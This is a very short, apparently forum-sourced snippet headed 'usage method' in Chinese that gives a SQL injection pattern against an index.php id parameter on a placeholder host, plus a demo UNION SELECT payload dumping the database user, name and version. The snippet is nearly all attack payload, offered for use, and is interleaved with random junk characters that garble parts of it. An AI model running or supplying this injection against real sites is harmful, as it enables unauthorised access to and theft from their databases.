利用方法:# b; v% q, t' l' {; U3 n
http://www.xxx.com/index.php?id=[SQL]
" ^0 v$ ?6 v; R7 u0 ?2 E4 [ Demo:
; S2 Y W; d+ K7 x0 @ @ http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |